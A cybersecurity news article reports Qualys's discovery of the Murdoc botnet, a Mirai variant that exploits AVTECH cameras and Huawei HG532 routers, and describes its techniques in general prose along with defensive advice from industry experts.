Murdoc Botnet Exploits IoT Vulnerabilities, Posing Major Cyber Threat

January 23, 2025

The discovery of the Murdoc Botnet, a new and potent variant of the notorious Mirai botnet, has heightened concerns within the cybersecurity community. Uncovered by diligent Qualys researchers, this latest menace takes advantage of vulnerabilities found in widely used IoT devices like AVTECH cameras and Huawei HG532 routers. By compromising these devices, cybercriminals can form extensive botnet networks, executing a variety of malicious activities that pose significant cyber threats to enterprises and consumers alike.

The Evolution of Mirai: From 2016 to Murdoc

First identified in late August 2016, the Mirai botnet has had a profound and enduring impact on the field of cybersecurity. Its ability to exploit even a single outdated or unpatched device has been a source of persistent trouble, as emphasized by Jason Soroko, Senior Fellow at Sectigo. This ongoing threat underlines the critical need for proactive security measures to defend networks from such impactful cybersecurity risks.

The Murdoc Botnet campaign, which began around mid-2024, has shown markedly enhanced capabilities when compared to the original Mirai botnet iteration. It predominantly targets IoT devices like AVTECH cameras and Huawei HG532 routers, leveraging well-known vulnerabilities such as CVE-2024-7029 and CVE-2017-17215. Notably, the frequency of these attacks saw a significant uptick starting in July 2024, with countries like Malaysia, Thailand, Mexico, and Indonesia identified as the most severely affected regions.

Technical Mechanics of the Murdoc Botnet

A central component of the Murdoc Botnet’s malicious operations involves the use of ELF files and shell scripts to deploy malware onto compromised devices. During their meticulous threat-hunting analysis, the Qualys Threat Research Unit uncovered significant evidence of widespread Mirai malware distribution. They identified over 1300 affected IP addresses, underscoring the expansive reach of this alarming campaign.

Furthermore, the investigation revealed the operation of more than 100 command-and-control (C2) servers that manage the compromised devices and distribute Mirai malware payloads. These C2 servers play a crucial role in facilitating the botnet’s expansion by issuing operational commands and maintaining communication with infected devices. The researchers at Qualys have provided detailed insights into the operational mechanics of these C2 servers as well as the embedded payloads within the botnet.

Exploiting IoT Device Vulnerabilities

The Murdoc Botnet shares several characteristics with the original Mirai botnet, particularly its focus on targeting *nix-based systems. It exploits vulnerabilities in devices such as AVTECH cameras and Huawei routers through known exploits to deploy its payload effectively. Upon successful installation, the botnet’s payload executes precise commands designed to ensure its efficacy.

For example, the payload targeting AVTECH cameras employs sophisticated shell scripts to fetch and execute malicious binaries, all while meticulously removing traces of the attack to avoid detection. Research data revealed over 500 samples of ELF and shell script files, which highlight the extensive nature of these coordinated attacks. The botnet’s final payload is crafted for further malicious activities, such as launching Distributed Denial-of-Service (DDoS) attacks from the compromised devices.

Advanced Techniques and Evasion Strategies

Jason Soroko notes that the Murdoc Botnet’s utilization of shell scripts and ELF binaries embodies how Mirai operators have adeptly adapted core techniques like command injection and network reconnaissance to encompass a broader range of platforms. These techniques, including the usage of base64 encoding and common administrative utilities, help the malware avoid detection, complicating incident response efforts.

Upon analyzing the shell scripts employed by the Murdoc Botnet, researchers observed that these scripts fetch the malware payload using the wget command. They subsequently execute it with chmod permissions before deleting the scripts to obscure their activities. By leveraging GTFOBins, a well-known collection of Unix binaries, the malicious scripts can execute seamlessly on compromised systems, demonstrating the high level of sophistication involved in these attacks.

Proactive Measures to Counter the Threat

In response to this evolving threat, Qualys recommends that organizations adopt several proactive measures to fortify their defenses. One key recommendation is the regular monitoring of suspicious activities, with a particular focus on detecting unusual processes or network traffic originating from untrusted binaries or shell scripts. It is also crucial to exercise caution when dealing with shell scripts, avoiding execution of those from unknown or untrusted sources.

Additionally, keeping all systems and firmware updated with the latest security patches is essential for mitigating known vulnerabilities. James Scobey, Chief Information Security Officer at Keeper Security, underscores the persistent and evolving nature of IoT vulnerabilities, as evidenced by the discoveries involving the Murdoc Botnet. He emphasizes that improved IoT security practices are paramount, including hardening device configurations, managing passwords, and restricting unauthorized access.

The Importance of Zero-Trust Principles

The revelation of the Murdoc Botnet, a powerful new variant of the infamous Mirai botnet, has significantly raised alarm among cybersecurity experts. This recent threat, uncovered by the dedicated researchers at Qualys, exploits vulnerabilities in widely used Internet of Things (IoT) devices, specifically AVTECH cameras and Huawei HG532 routers. By hijacking these devices, cybercriminals create extensive botnet networks, enabling them to carry out a wide range of malicious activities. Such activities can include launching Distributed Denial of Service (DDoS) attacks, stealing sensitive information, and spreading malware, all of which pose severe cyber risks not only to businesses but also to individual consumers. The ability to compromise everyday devices and transform them into tools for cyberattacks underscores the urgent need for robust security measures within the IoT landscape. As the digital landscape evolves, it becomes increasingly crucial for enterprises and consumers to stay vigilant and implement stringent security protocols to protect their networks and personal data from these sophisticated threats.

Subscribe to our weekly news digest.

Join now and become a part of our fast-growing community.

Invalid Email Address
Thanks for Subscribing!
We'll be sending you our best soon!
Something went wrong, please try again later